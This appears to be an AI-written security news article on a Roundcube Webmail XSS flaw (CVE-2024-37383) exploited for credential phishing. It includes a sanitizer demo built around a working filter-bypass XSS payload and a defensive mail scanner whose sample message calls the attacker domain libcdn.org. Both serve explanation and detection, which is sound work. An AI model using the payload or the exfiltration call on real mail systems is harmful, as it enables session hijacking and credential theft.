Ethical Hacking News

Roundcube Webmail Flaw Exploited in Phishing Campaign: A Cautionary Tale of Vulnerability and Cybercrime



Unknown threat actors have exploited a now-patched cross-site scripting (XSS) vulnerability in Roundcube Webmail in a phishing campaign aimed at stealing users' credentials. Researchers warn that Roundcube flaws remain a frequent target for attackers, not least because the open-source webmail software is widely deployed by government agencies.

  • An unknown threat actor exploited CVE-2024-37383, an XSS flaw in Roundcube Webmail, to steal user credentials.
  • The phishing emails showed an empty body; the malicious HTML and an attached document were not visible in the mail client.
  • Roundcube 1.5.7 and 1.6.7 fix the flaw; upgrade to those releases or later.
  • A crafted email lets the attacker run arbitrary JavaScript in the victim's browser when the message is opened, which this campaign used to display a fake login form and exfiltrate credentials.


    The discovery of an unknown threat actor exploiting a now-patched vulnerability in Roundcube Webmail is another reminder that known webmail flaws are weaponised quickly. According to researchers from Positive Technologies, the vulnerable software was targeted in a phishing campaign designed to harvest user credentials.

    The vulnerability exploited, tracked as CVE-2024-37383 (CVSS score: 6.1), affects Roundcube Webmail versions before 1.5.7 and 1.6.x versions before 1.6.7. The flaw is fixed in current releases, but installations still running outdated versions remain exposed to this attack vector.

    The phishing campaign, believed to have taken place in June 2024, used emails whose body appeared empty and whose attached document was not shown by the mail client. Inspection of the raw message revealed tags containing the expression eval(atob(…)), which decodes a base64 string and executes the result as JavaScript. The attacker had also inserted an extra space into the "href" attribute name, which the researchers identified as the trigger for CVE-2024-37383.

    The impact is significant: a specially crafted email, once opened in a vulnerable Roundcube version, executes attacker-controlled JavaScript in the recipient's browser in the context of the webmail session. No attachment has to be opened and no link clicked; viewing the message is enough.

    As the Positive Technologies report explains, Roundcube's HTML filter expected attributes in the form {attribute name}={attribute value}. With a space inserted after "href", the filter no longer recognised the attribute as "href", so it was not filtered and was passed through to the rendered page. Browsers, however, tolerate whitespace around the "=" and still treat it as a genuine "href", so a JavaScript payload placed in its value runs inside the Roundcube page whenever a vulnerable client opens the malicious email.
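    The filter-bypass class the report describes can be shown in a few lines. The following is an added Python illustration, not Roundcube's own PHP code (rcube_washtml) and not the campaign's actual payload: a naive regex filter only recognises attributes written exactly as name="value", so an attribute written as href ="javascript:…" slips past it unchanged, while a sanitizer that tokenises attributes with a real HTML parser sees the normalised name "href" and can drop the dangerous value. The markup, the base64 string and the scheme list are constructed for this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed test input in the shape the article describes: a space between
# the attribute name "href" and "=", with a javascript: URL as the value.
PAYLOAD = '<a href ="javascript:eval(atob(\'YWxlcnQoMSk=\'))">open</a><p>hello</p>'

URL_ATTRS = {"href", "src", "xlink:href", "action", "formaction"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")

# Weak filter: a regex that only matches attributes written as name="value".
# "href =" has a space before "=", so this pattern never sees it as "href".
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')

def _is_dangerous_url(value: str) -> bool:
    # Browsers ignore whitespace and control characters inside a scheme, so strip
    # them before comparing, otherwise "java\nscript:" would slip through.
    normalised = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    return normalised.startswith(DANGEROUS_SCHEMES)

def naive_sanitize(html: str) -> str:
    """Regex-based filter modelling the weakness: it drops href="javascript:..."
    but leaves href ="javascript:..." (note the space) completely untouched."""
    def fix(match: re.Match) -> str:
        name, value = match.group(1).lower(), match.group(2)
        if name in URL_ATTRS and _is_dangerous_url(value):
            return ""
        return match.group(0)
    return ATTR_RE.sub(fix, html)

class _Rebuilder(HTMLParser):
    """Re-serialises the document from parsed tokens. The parser handles
    whitespace around "=" and lower-cases attribute names, so the filter
    decides on the attribute the browser will actually see."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=False)
        self.out: list[str] = []

    def _tag(self, tag: str, attrs, close: str) -> str:
        parts = [tag]
        for name, value in attrs:
            name = name.strip().lower()
            value = "" if value is None else value
            if name.startswith("on"):            # drop event handlers outright
                continue
            if name in URL_ATTRS and _is_dangerous_url(value):
                continue                          # drop javascript:/vbscript:/data: URLs
            parts.append(f'{name}="{escape(value, quote=True)}"')
        return "<" + " ".join(parts) + close + ">"

    def handle_starttag(self, tag, attrs):      self.out.append(self._tag(tag, attrs, ""))
    def handle_startendtag(self, tag, attrs):   self.out.append(self._tag(tag, attrs, " /"))
    def handle_endtag(self, tag):               self.out.append(f"</{tag}>")
    def handle_data(self, data):                self.out.append(data)
    def handle_entityref(self, name):           self.out.append(f"&{name};")
    def handle_charref(self, name):             self.out.append(f"&#{name};")

def hardened_sanitize(html: str) -> str:
    """Parser-based filter: tokenises attributes properly, then rebuilds the tag."""
    parser = _Rebuilder()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)

if __name__ == "__main__":
    print("naive   :", naive_sanitize(PAYLOAD))     # javascript: survives
    print("hardened:", hardened_sanitize(PAYLOAD))  # href dropped: <a>open</a><p>hello</p>
```

    The lesson is not the particular regex but the approach: a filter that pattern-matches serialised HTML makes assumptions about syntax that the browser does not share. Any sanitizer should operate on the parsed attribute list and re-serialise from it, so that name normalisation (case, surrounding whitespace) happens before the allow/deny decision.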

    In this campaign, the JavaScript payload saved an empty Word document ("Road map.docx") as a decoy and attempted to retrieve messages from the mail server via the ManageSieve plugin. It then injected a fake login form into Roundcube's interface and sent any credentials entered into it to an attacker-controlled server, libcdn.org, a domain registered in 2024.
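    For defenders, the artefacts named above (the eval(atob(…)) construct, an attribute name with whitespace before "=", and the libcdn.org domain) are the things to look for in mail already sitting in users' mailboxes or in a mail gateway's quarantine. The script below is an added Python example, not part of the original report or of Roundcube: it parses a raw MIME message, decodes each text/html part (the transfer encoding included, since payloads are commonly base64-encoded), and counts indicator hits. The two sample messages are constructed for this example; the regexes are heuristics and the attribute-spacing one in particular can fire on hand-written HTML, so hits are for triage, not verdicts.

```python
import base64
import re
from email import message_from_string
from email.message import Message

# Heuristic indicators drawn from the campaign description. The second pattern
# looks for whitespace between an href/src attribute name and "=" inside a tag,
# which mail clients do not normally emit.
INDICATORS = {
    "eval_atob":            re.compile(r"eval\s*\(\s*atob\s*\(", re.I),
    "attr_space_before_eq": re.compile(r"<[^>]*\b(?:href|src)\s+=", re.I),
    "exfil_domain":         re.compile(r"\blibcdn\.org\b", re.I),
}

def html_parts(msg: Message):
    """Yield every text/html body in the message, decoded to str."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            raw = part.get_payload(decode=True) or b""   # undoes base64/quoted-printable
            charset = part.get_content_charset() or "utf-8"
            yield raw.decode(charset, errors="replace")

def triage(raw_message: str) -> dict:
    """Return indicator hit counts for one raw RFC 5322 message."""
    msg = message_from_string(raw_message)
    hits: dict[str, int] = {}
    for html in html_parts(msg):
        for name, pattern in INDICATORS.items():
            count = len(pattern.findall(html))
            if count:
                hits[name] = hits.get(name, 0) + count
    return {
        "subject": msg.get("Subject", ""),
        "hits": hits,
        "suspicious": bool(hits),
    }

# --- constructed sample messages (not real campaign traffic) -----------------
def build_message(subject: str, html: str) -> str:
    """Wrap an HTML body in a minimal base64-encoded single-part MIME message."""
    body = base64.b64encode(html.encode("utf-8")).decode("ascii")
    return (
        "From: sender@example.test\r\n"
        "To: victim@example.test\r\n"
        f"Subject: {subject}\r\n"
        "MIME-Version: 1.0\r\n"
        'Content-Type: text/html; charset="utf-8"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        "\r\n"
        f"{body}\r\n"
    )

MALICIOUS_HTML = (
    '<html><body>'
    '<a href ="javascript:eval(atob(\'Zm9vKCk=\'))">x</a>'
    '<script>fetch("https://libcdn.org/collect", {method: "POST"})</script>'
    '</body></html>'
)
BENIGN_HTML = (
    '<html><body><p>Minutes attached.</p>'
    '<a href="https://intranet.example.test/minutes">Minutes</a></body></html>'
)

SAMPLES = [
    build_message("(no subject)", MALICIOUS_HTML),
    build_message("Team meeting minutes", BENIGN_HTML),
]

def scan(messages) -> list[dict]:
    return [triage(m) for m in messages]

if __name__ == "__main__":
    for result in scan(SAMPLES):
        flag = "SUSPICIOUS" if result["suspicious"] else "clean"
        print(f'{flag:10} {result["subject"]!r} {result["hits"]}')
```

    In a real deployment the same triage function would be pointed at a Maildir, a gateway quarantine or an mbox export, and the indicator table extended with whatever the current advisory lists. Because the HTML is decoded from the transfer encoding before matching, a base64-encoded body does not hide the eval(atob(…)) string from the scan.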

    Roundcube Webmail vulnerabilities have been a recurring target, not least because of the software's wide use by government agencies. Previously, the Winter Vivern group exploited an XSS flaw in Roundcube against government organisations in several European countries. Based on the information available, however, this campaign cannot be attributed to any known actor.

    The implications reach beyond a single mailbox: a webmail session compromise exposes the mail itself and yields credentials that are frequently reused against other services, enabling account takeover, impersonation and further intrusion.

    Organisations running Roundcube Webmail should confirm their installations are at 1.5.7 or 1.6.7 or later, which address CVE-2024-37383, and review mail received around June 2024 for the indicators described above. End users should remain cautious with messages from unfamiliar senders, but note that in this attack merely viewing the message in a vulnerable client was sufficient; patching, not user vigilance, is the control that matters.

    Tracking vendor advisories for webmail software and applying fixes promptly remains the most effective defence against this class of attack.

    Related Information:

  • https://securityaffairs.com/170055/hacking/roundcube-flaw-exploited-in-phishing-attack.html

  • https://nvd.nist.gov/vuln/detail/CVE-2024-37383

  • https://www.cvedetails.com/cve/CVE-2024-37383/


    Published: Mon Oct 21 12:57:43 2024 by llama3.2 3B Q4_K_M



    © Ethical Hacking News . All rights reserved.